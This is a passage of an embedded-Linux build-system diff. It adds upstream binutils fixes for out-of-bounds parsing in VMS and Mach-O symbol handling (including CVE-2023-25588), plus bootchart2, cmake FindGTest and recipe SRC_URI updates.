+ _bfd_error_handler (_("unknown source command %d"),
+ cmd);
+- cmd_length = 2;
+ break;
+ }
+
+@@ -4486,7 +4536,7 @@ parse_module (bfd *abfd, struct module *
+
+ vms_debug2 ((3, "line info\n"));
+
+- while (pcl_ptr < ptr + rec_length)
++ while (pcl_ptr - ptr < rec_length)
+ {
+ /* The command byte is signed so we must sign-extend it. */
+ int cmd = ((signed char *)pcl_ptr)[0], cmd_length, data;
+@@ -4494,10 +4544,106 @@ parse_module (bfd *abfd, struct module *
+ switch (cmd)
+ {
+ case DST__K_DELTA_PC_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_DELTA_PC_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_INCR_LINUM:
++ cmd_length = 2;
++ break;
++
++ case DST__K_INCR_LINUM_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_INCR_LINUM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_LINUM_INCR:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SET_LINUM_INCR_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_RESET_LINUM_INCR:
++ cmd_length = 1;
++ break;
++
++ case DST__K_BEG_STMT_MODE:
++ cmd_length = 1;
++ break;
++
++ case DST__K_END_STMT_MODE:
++ cmd_length = 1;
++ break;
++
++ case DST__K_SET_LINUM_B:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SET_LINUM:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SET_LINUM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_PC:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SET_PC_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SET_PC_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_STMTNUM:
++ cmd_length = 2;
++ break;
++
++ case DST__K_TERM:
++ cmd_length = 2;
++ break;
++
++ case DST__K_TERM_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_TERM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_ABS_PC:
++ cmd_length = 5;
++ break;
++
++ default:
++ if (cmd <= 0)
++ cmd_length = 1;
++ else
++ cmd_length = 2;
++ break;
++ }
++
++ if (pcl_ptr - ptr + cmd_length > rec_length)
++ break;
++
++ switch (cmd)
++ {
++ case DST__K_DELTA_PC_W:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_pc += data;
+ curr_linenum += 1;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_DELTA_PC_W: %d\n", data));
+ break;
+
+@@ -4505,131 +4651,111 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_pc += data;
+ curr_linenum += 1;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_DELTA_PC_L: %d\n", data));
+ break;
+
+ case DST__K_INCR_LINUM:
+ data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ curr_linenum += data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST__K_INCR_LINUM: %d\n", data));
+ break;
+
+ case DST__K_INCR_LINUM_W:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_linenum += data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_INCR_LINUM_W: %d\n", data));
+ break;
+
+ case DST__K_INCR_LINUM_L:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_linenum += data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_INCR_LINUM_L: %d\n", data));
+ break;
+
+ case DST__K_SET_LINUM_INCR:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_LINUM_INCR");
+- cmd_length = 2;
+ break;
+
+ case DST__K_SET_LINUM_INCR_W:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_LINUM_INCR_W");
+- cmd_length = 3;
+ break;
+
+ case DST__K_RESET_LINUM_INCR:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_RESET_LINUM_INCR");
+- cmd_length = 1;
+ break;
+
+ case DST__K_BEG_STMT_MODE:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_BEG_STMT_MODE");
+- cmd_length = 1;
+ break;
+
+ case DST__K_END_STMT_MODE:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_END_STMT_MODE");
+- cmd_length = 1;
+ break;
+
+ case DST__K_SET_LINUM_B:
+ data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ curr_linenum = data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST__K_SET_LINUM_B: %d\n", data));
+ break;
+
+ case DST__K_SET_LINUM:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_linenum = data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_SET_LINE_NUM: %d\n", data));
+ break;
+
+ case DST__K_SET_LINUM_L:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_linenum = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_SET_LINUM_L: %d\n", data));
+ break;
+
+ case DST__K_SET_PC:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_PC");
+- cmd_length = 2;
+ break;
+
+ case DST__K_SET_PC_W:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_PC_W");
+- cmd_length = 3;
+ break;
+
+ case DST__K_SET_PC_L:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_PC_L");
+- cmd_length = 5;
+ break;
+
+ case DST__K_SET_STMTNUM:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_STMTNUM");
+- cmd_length = 2;
+ break;
+
+ case DST__K_TERM:
+ data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ curr_pc += data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST__K_TERM: %d\n", data));
+ break;
+
+ case DST__K_TERM_W:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_pc += data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_TERM_W: %d\n", data));
+ break;
+
+ case DST__K_TERM_L:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_pc += data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_TERM_L: %d\n", data));
+ break;
+
+ case DST__K_SET_ABS_PC:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_pc = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_SET_ABS_PC: 0x%x\n", data));
+ break;
+
+@@ -4638,15 +4764,11 @@ parse_module (bfd *abfd, struct module *
+ {
+ curr_pc -= cmd;
+ curr_linenum += 1;
+- cmd_length = 1;
+ vms_debug2 ((4, "bump pc to 0x%lx and line to %d\n",
+ (unsigned long)curr_pc, curr_linenum));
+ }
+ else
+- {
+- _bfd_error_handler (_("unknown line command %d"), cmd);
+- cmd_length = 2;
+- }
++ _bfd_error_handler (_("unknown line command %d"), cmd);
+ break;
+ }
+
+@@ -4778,7 +4900,7 @@ build_module_list (bfd *abfd)
+ return NULL;
+
+ module = new_module (abfd);
+- parse_module (abfd, module, PRIV (dst_section)->contents, -1);
++ parse_module (abfd, module, PRIV (dst_section)->contents, PRIV (dst_section)->size);
+ list = module;
+ }
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
new file mode 100644
index 0000000000..aa5ce5f3ff
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
@@ -0,0 +1,149 @@
+From d12f8998d2d086f0a6606589e5aedb7147e6f2f1 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 14 Oct 2022 10:30:21 +1030
+Subject: [PATCH] PR29677, Field `the_bfd` of `asymbol` is uninitialised
+
+Besides not initialising the_bfd of synthetic symbols, counting
+symbols when sizing didn't match symbols created if there were any
+dynsyms named "". We don't want synthetic symbols without names
+anyway, so get rid of them. Also, simplify and correct sanity checks.
+
+ PR 29677
+ * mach-o.c (bfd_mach_o_get_synthetic_symtab): Rewrite.
+---
+Upstream-Status: Backport from [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=d12f8998d2d086f0a6606589e5aedb7147e6f2f1]
+CVE: CVE-2023-25588
+CVE: CVE-2022-47696
+
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+Signed-off-by: poojitha adireddy <pooadire@cisco.com>
+
+ bfd/mach-o.c | 72 ++++++++++++++++++++++------------------------------
+ 1 file changed, 31 insertions(+), 41 deletions(-)
+
+diff --git a/bfd/mach-o.c b/bfd/mach-o.c
+index acb35e7f0c6..5279343768c 100644
+--- a/bfd/mach-o.c
++++ b/bfd/mach-o.c
+@@ -938,11 +938,9 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ bfd_mach_o_symtab_command *symtab = mdata->symtab;
+ asymbol *s;
+ char * s_start;
+- char * s_end;
+ unsigned long count, i, j, n;
+ size_t size;
+ char *names;
+- char *nul_name;
+ const char stub [] = "$stub";
+
+ *ret = NULL;
+@@ -955,27 +953,27 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ /* We need to allocate a bfd symbol for every indirect symbol and to
+ allocate the memory for its name. */
+ count = dysymtab->nindirectsyms;
+- size = count * sizeof (asymbol) + 1;
+-
++ size = 0;
+ for (j = 0; j < count; j++)
+ {
+- const char * strng;
+ unsigned int isym = dysymtab->indirect_syms[j];
++ const char *str;
+
+ /* Some indirect symbols are anonymous. */
+- if (isym < symtab->nsyms && (strng = symtab->symbols[isym].symbol.name))
+- /* PR 17512: file: f5b8eeba. */
+- size += strnlen (strng, symtab->strsize - (strng - symtab->strtab)) + sizeof (stub);
++ if (isym < symtab->nsyms
++ && (str = symtab->symbols[isym].symbol.name) != NULL)
++ {
++ /* PR 17512: file: f5b8eeba. */
++ size += strnlen (str, symtab->strsize - (str - symtab->strtab));
++ size += sizeof (stub);
++ }
+ }
+
+- s_start = bfd_malloc (size);
++ s_start = bfd_malloc (size + count * sizeof (asymbol));
+ s = *ret = (asymbol *) s_start;
+ if (s == NULL)
+ return -1;
+ names = (char *) (s + count);
+- nul_name = names;
+- *names++ = 0;
+- s_end = s_start + size;
+
+ n = 0;
+ for (i = 0; i < mdata->nsects; i++)
+@@ -997,47 +995,39 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ entry_size = bfd_mach_o_section_get_entry_size (abfd, sec);
+
+ /* PR 17512: file: 08e15eec. */
+- if (first >= count || last >= count || first > last)
++ if (first >= count || last > count || first > last)
+ goto fail;
+
+ for (j = first; j < last; j++)
+ {
+ unsigned int isym = dysymtab->indirect_syms[j];
+-
+- /* PR 17512: file: 04d64d9b. */
+- if (((char *) s) + sizeof (* s) > s_end)
+- goto fail;
+-
+- s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
+- s->section = sec->bfdsection;
+- s->value = addr - sec->addr;
+- s->udata.p = NULL;
++ const char *str;
++ size_t len;
+
+ if (isym < symtab->nsyms
+- && symtab->symbols[isym].symbol.name)
++ && (str = symtab->symbols[isym].symbol.name) != NULL)
+ {
+- const char *sym = symtab->symbols[isym].symbol.name;
+- size_t len;
+-
+- s->name = names;
+- len = strlen (sym);
+- /* PR 17512: file: 47dfd4d2. */
+- if (names + len >= s_end)
++ /* PR 17512: file: 04d64d9b. */
++ if (n >= count)
+ goto fail;
+- memcpy (names, sym, len);
+- names += len;
+- /* PR 17512: file: 18f340a4. */
+- if (names + sizeof (stub) >= s_end)
++ len = strnlen (str, symtab->strsize - (str - symtab->strtab));
++ /* PR 17512: file: 47dfd4d2, 18f340a4. */
++ if (size < len + sizeof (stub))
+ goto fail;
+- memcpy (names, stub, sizeof (stub));
+- names += sizeof (stub);
++ memcpy (names, str, len);
++ memcpy (names + len, stub, sizeof (stub));
++ s->name = names;
++ names += len + sizeof (stub);
++ size -= len + sizeof (stub);
++ s->the_bfd = symtab->symbols[isym].symbol.the_bfd;
++ s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
++ s->section = sec->bfdsection;
++ s->value = addr - sec->addr;
++ s->udata.p = NULL;
++ s++;
++ n++;
+ }
+- else
+- s->name = nul_name;
+-
+ addr += entry_size;
+- s++;
+- n++;
+ }
+ break;
+ default:
+--
+2.39.3
+
diff --git a/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
new file mode 100644
index 0000000000..3cb8a3c2a2
--- /dev/null
+++ b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
@@ -0,0 +1,68 @@
+From 988ca784d4840c87509e770a21d5d22105af8668 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Fri, 5 Nov 2021 11:18:07 +0800
+Subject: [PATCH] bootchartd.in: make sure only one bootchartd process
+
+When booting with "init=/sbin/bootchartd" as below:
+ # runqemu qemux86 bootparams="init=/sbin/bootchartd"
+
+There are two bootchartd processes after boot [1].
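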
+ # ps -ef | grep bootchart
+root 101 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 103 101 8 03:27 ? 00:00:02 /lib64/bootchart/bootchart-collector 50
+root 106 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 792 106 0 03:27 ? 00:00:00 /lib64/bootchart/bootchart-collector --usleep 1000000
+root 794 725 0 03:27 ttyS0 00:00:00 grep bootchart
+
+ # /sbin/bootchartd stop
+[bootchart] bootchart-collector started as pid 596 with 2 args:
+[bootchart] '--dump'
+[bootchart] '/tmp/bootchart.3lXpVDAq3v'
+[bootchart] Extracting profile data from pid 204
+[bootchart] map 0xbed9a000 -> 0xbedbb000 size: 132k from 'bed9a000' 'bedbb000'
+[bootchart] read 135168 bytes of 135168
+[bootchart] reading 150 chunks (of 150) ...
+[bootchart] wrote 18760 kbB
+[bootchart] bootchart-collector pid: 596 unmounted proc / clean exit
+
+But there is still one bootchartd process left after the above stop command finishes.
+ # ps -ef | grep bootchartd
+root 202 1 0 09:09 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 629 516 0 09:10 ? 00:00:00 grep bootchartd
+
+Remove the wait_boot call, which waited for the boot process to finish,
+so that only one bootchartd process remains. The wait_boot logic is not
+needed anyway: we either run "/sbin/bootchartd stop" to stop bootchartd
+manually, or install the bootchartd-stop-initscript package together with
+bootchart2 to stop bootchartd automatically after boot.
+
+After patch:
+ # ps -ef | grep bootchart
+ root 101 1 0 03:36 ? 00:00:00 /bin/sh /sbin/bootchartd
+ root 103 101 6 03:36 ? 00:00:04 /lib64/bootchart/bootchart-collector 50
+ root 596 592 0 03:37 ttyS0 00:00:00 grep bootchart
+
+[1] https://github.com/xrmx/bootchart/issues/94
+
+Upstream-Status: Submitted [https://github.com/xrmx/bootchart/pull/95]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ bootchartd.in | 1 -
+ 1 file changed, 1 deletion(-)
+
+diff --git a/bootchartd.in b/bootchartd.in
+index 7979ef9..f0e466d 100755
+--- a/bootchartd.in
++++ b/bootchartd.in
+@@ -183,7 +183,6 @@ if [ $$ -eq 1 ]; then
+ else # running inside the main system
+ echo "bootchart: no initrd used; starting"
+ start &
+- wait_boot &
+ # wait a little, until the collector is going, before allowing
+ # the rest of the system to charge ahead, so we catch it
+ $USLEEP 250000
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
index a938b2da49..7f05bd1b0b 100644
--- a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb
+++ b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
@@ -90,15 +90,15 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=44ac4678311254db62edf8fd39cb8124"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)"
-SRC_URI = "git://github.com/xrmx/bootchart.git \
+SRC_URI = "git://github.com/xrmx/bootchart.git;branch=master;protocol=https \
file://bootchartd_stop.sh \
file://0001-collector-Allocate-space-on-heap-for-chunks.patch \
file://0001-bootchart2-support-usrmerge.patch \
+ file://0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch \
"
S = "${WORKDIR}/git"
-SRCREV = "331ada031f1d65f6d934d918f896e1c708c64bf7"
-PV .= "+git${SRCPV}"
+SRCREV = "868a2afab9da34f32c007d773b77253c93104636"
inherit systemd update-rc.d python3native update-alternatives
@@ -144,7 +144,7 @@ do_install () {
PACKAGES =+ "pybootchartgui"
FILES_pybootchartgui += "${PYTHON_SITEPACKAGES_DIR}/pybootchartgui ${bindir}/pybootchartgui"
-RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-shell python3-compression python3-codecs"
+RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-math python3-shell python3-compression python3-codecs"
RDEPENDS_${PN}_class-target += "${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'sysvinit-pidof', 'procps', d)}"
RDEPENDS_${PN}_class-target += "lsb-release"
DEPENDS_append_class-native = " python3-pycairo-native"
diff --git a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
index cdc971cf5d..be61916cc6 100644
--- a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
+++ b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
@@ -15,7 +15,7 @@ DEPENDS_append_class-target = " udev"
RDEPENDS_${PN} = "libgcc"
SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334"
-SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git \
+SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master \
file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \
"
@@ -49,4 +49,4 @@ do_install_append() {
fi
}
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-devtools/build-compare/build-compare_git.bb b/meta/recipes-devtools/build-compare/build-compare_git.bb
index b0560cc277..6afa9a0d68 100644
--- a/meta/recipes-devtools/build-compare/build-compare_git.bb
+++ b/meta/recipes-devtools/build-compare/build-compare_git.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/openSUSE/build-compare"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
-SRC_URI = "git://github.com/openSUSE/build-compare.git \
+SRC_URI = "git://github.com/openSUSE/build-compare.git;branch=master;protocol=https \
file://Ignore-DWARF-sections.patch;striplevel=1 \
"
diff --git a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
index c08da6cdca..cd2ca8dbe9 100644
--- a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
+++ b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
@@ -3,6 +3,7 @@
# Released under the MIT license (see packages/COPYING)
SUMMARY = "A set of tools for CD recording, including cdrecord"
HOMEPAGE = "http://sourceforge.net/projects/cdrtools/"
+DESCRIPTION = "cdrecord tool is Highly portable CD/DVD/BluRay command line recording software."
SECTION = "console/utils"
LICENSE = "GPLv2 & CDDL-1.0 & LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=32f68170be424c2cd64804337726b312"
diff --git a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
index b2952ee5f5..96a7be6770 100644
--- a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
+++ b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
@@ -7,6 +7,7 @@ SRC_URI += "file://OEToolchainConfig.cmake \
file://environment.d-cmake.sh \
file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \
file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \
+ file://0006-cmake-FindGTest-Add-target-for-gmock-library.patch \
"
diff --git a/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
new file mode 100644
index 0000000000..267f586a71
--- /dev/null
+++ b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
@@ -0,0 +1,255 @@
+From 39eae0d6c1b398f18761abac7f55944f0290f8a1 Mon Sep 17 00:00:00 2001
+From: Eero Aaltonen <eero.aaltonen@iki.fi>
+Date: Sun, 17 Oct 2021 17:13:07 +0300
+Subject: [PATCH] FindGTest: Add target for gmock library
+
+`googlemock` has been absorbed into the
+[googletest](https://github.com/google/googletest) project and is built
+and installed from the same source tree.
+
+As GTest may be built with or without GMock, skip GMock if it is not
+present.
+
+Do not provide result variables for GMock. They are not provided by
+upstream GTest's CMake Package Configuration File.
+
+Also update the test case to cover linking to `GTest::gmock`.
+
+The patch was imported from the Kitware git server
+(git@gitlab.kitware.com:cmake/cmake.git) as of commit id
+50bf457a0dd857cf976b22c5be7d333493233d1e
+
+Patch was modified to support upper case variable `GTEST_FOUND`.
+
+Upstream-Status: Accepted [https://gitlab.kitware.com/cmake/cmake/-/merge_requests/6632]
+Milestone: 3.23.0
+
+Signed-off-by: Eero Aaltonen <eero.aaltonen@vaisala.com>
+---
+ .../dev/FindGTest-target-for-gmock.rst | 4 +
+ Modules/FindGTest.cmake | 133 +++++++++++++++---
+ Tests/FindGTest/Test/CMakeLists.txt | 4 +
+ 3 files changed, 121 insertions(+), 20 deletions(-)
+ create mode 100644 Help/release/dev/FindGTest-target-for-gmock.rst
+
+diff --git a/Help/release/dev/FindGTest-target-for-gmock.rst b/Help/release/dev/FindGTest-target-for-gmock.rst
+new file mode 100644
+index 0000000000..f78242c80e
+--- /dev/null
++++ b/Help/release/dev/FindGTest-target-for-gmock.rst
+@@ -0,0 +1,4 @@
++FindGTest-target-for-gmock
++--------------------------
++
++* The :module:`FindGTest` module now provides a target for GMock, if found.
+diff --git a/Modules/FindGTest.cmake b/Modules/FindGTest.cmake
+index e015a9840f..0331049594 100644
+--- a/Modules/FindGTest.cmake
++++ b/Modules/FindGTest.cmake
+@@ -7,10 +7,23 @@ FindGTest
+
+ Locate the Google C++ Testing Framework.
+
++.. versionadded:: 3.20
++ Upstream ``GTestConfig.cmake`` is used if possible.
++
+ Imported targets
+ ^^^^^^^^^^^^^^^^
+
+-This module defines the following :prop_tgt:`IMPORTED` targets:
++ This module defines the following :prop_tgt:`IMPORTED` targets:
++
++``GTest::gtest``
++ The Google Test ``gtest`` library, if found; adds Thread::Thread
++ automatically
++``GTest::gtest_main``
++ The Google Test ``gtest_main`` library, if found
++
++.. deprecated:: 3.20
++ For backwards compatibility, this module defines additionally the
++ following deprecated :prop_tgt:`IMPORTED` targets (available since 3.5):
+
+ ``GTest::GTest``
+ The Google Test ``gtest`` library, if found; adds Thread::Thread
+@@ -18,7 +31,6 @@ This module defines the following :prop_tgt:`IMPORTED` targets:
+ ``GTest::Main``
+ The Google Test ``gtest_main`` library, if found
+
+-
+ Result variables
+ ^^^^^^^^^^^^^^^^
+
+@@ -146,8 +158,42 @@ function(__gtest_import_library _target _var _config)
+ endif()
+ endfunction()
+
++function(__gtest_define_backwards_compatible_library_targets)
++ set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES} PARENT_SCOPE)
++
++ # Add targets mapping the same library names as defined in
++ # older versions of CMake's FindGTest
++ if(NOT TARGET GTest::GTest)
++ add_library(GTest::GTest INTERFACE IMPORTED)
++ target_link_libraries(GTest::GTest INTERFACE GTest::gtest)
++ endif()
++ if(NOT TARGET GTest::Main)
++ add_library(GTest::Main INTERFACE IMPORTED)
++ target_link_libraries(GTest::Main INTERFACE GTest::gtest_main)
++ endif()
++endfunction()
++
+ #
+
++include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
++
++# first specifically look for the CMake version of GTest
++find_package(GTest QUIET NO_MODULE)
++
++# if we found the GTest cmake package then we are done, and
++# can print what we found and return.
++if(GTest_FOUND)
++ set(GTEST_FOUND ${GTest_FOUND})
++ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest HANDLE_COMPONENTS CONFIG_MODE)
++
++ set(GTEST_LIBRARIES GTest::gtest)
++ set(GTEST_MAIN_LIBRARIES GTest::gtest_main)
++
++ __gtest_define_backwards_compatible_library_targets()
++
++ return()
++endif()
++
+ if(NOT DEFINED GTEST_MSVC_SEARCH)
+ set(GTEST_MSVC_SEARCH MD)
+ endif()
+@@ -194,50 +240,97 @@ if(MSVC AND GTEST_MSVC_SEARCH STREQUAL "MD")
+ __gtest_find_library(GTEST_LIBRARY_DEBUG gtest-mdd gtestd)
+ __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main-md gtest_main)
+ __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_main-mdd gtest_maind)
++ __gtest_find_library(GMOCK_LIBRARY gmock-md gmock)
++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmock-mdd gmockd)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main-md gmock_main)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_main-mdd gmock_maind)
+ else()
+ __gtest_find_library(GTEST_LIBRARY gtest)
+ __gtest_find_library(GTEST_LIBRARY_DEBUG gtestd)
+ __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main)
+ __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_maind)
++ __gtest_find_library(GMOCK_LIBRARY gmock)
++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmockd)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_maind)
+ endif()
+
+-include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
+ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest DEFAULT_MSG GTEST_LIBRARY GTEST_INCLUDE_DIR GTEST_MAIN_LIBRARY)
+
+-if(GTEST_FOUND)
++if(GMOCK_LIBRARY AND GMOCK_MAIN_LIBRARY)
++ set(GMock_FOUND True)
++else()
++ set(GMock_FOUND False)
++endif()
++
++if(GTest_FOUND)
+ set(GTEST_INCLUDE_DIRS ${GTEST_INCLUDE_DIR})
+ __gtest_append_debugs(GTEST_LIBRARIES GTEST_LIBRARY)
+ __gtest_append_debugs(GTEST_MAIN_LIBRARIES GTEST_MAIN_LIBRARY)
+- set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES})
+
+ find_package(Threads QUIET)
+
+- if(NOT TARGET GTest::GTest)
++ if(NOT TARGET GTest::gtest)
+ __gtest_determine_library_type(GTEST_LIBRARY)
+- add_library(GTest::GTest ${GTEST_LIBRARY_TYPE} IMPORTED)
++ add_library(GTest::gtest ${GTEST_LIBRARY_TYPE} IMPORTED)
+ if(TARGET Threads::Threads)
+- set_target_properties(GTest::GTest PROPERTIES
++ set_target_properties(GTest::gtest PROPERTIES
+ INTERFACE_LINK_LIBRARIES Threads::Threads)
+ endif()
+ if(GTEST_LIBRARY_TYPE STREQUAL "SHARED")
+- set_target_properties(GTest::GTest PROPERTIES
++ set_target_properties(GTest::gtest PROPERTIES
+ INTERFACE_COMPILE_DEFINITIONS "GTEST_LINKED_AS_SHARED_LIBRARY=1")
+ endif()
+ if(GTEST_INCLUDE_DIRS)
+- set_target_properties(GTest::GTest PROPERTIES
++ set_target_properties(GTest::gtest PROPERTIES
+ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
+ endif()
+- __gtest_import_library(GTest::GTest GTEST_LIBRARY "")
+- __gtest_import_library(GTest::GTest GTEST_LIBRARY "RELEASE")
+- __gtest_import_library(GTest::GTest GTEST_LIBRARY "DEBUG")
++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "")
++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "DEBUG")
+ endif()
+- if(NOT TARGET GTest::Main)
++ if(NOT TARGET GTest::gtest_main)
+ __gtest_determine_library_type(GTEST_MAIN_LIBRARY)
+- add_library(GTest::Main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
+- set_target_properties(GTest::Main PROPERTIES
+- INTERFACE_LINK_LIBRARIES "GTest::GTest")
+- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "")
+- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "RELEASE")
+- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "DEBUG")
++ add_library(GTest::gtest_main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
++ set_target_properties(GTest::gtest_main PROPERTIES
++ INTERFACE_LINK_LIBRARIES "GTest::gtest")
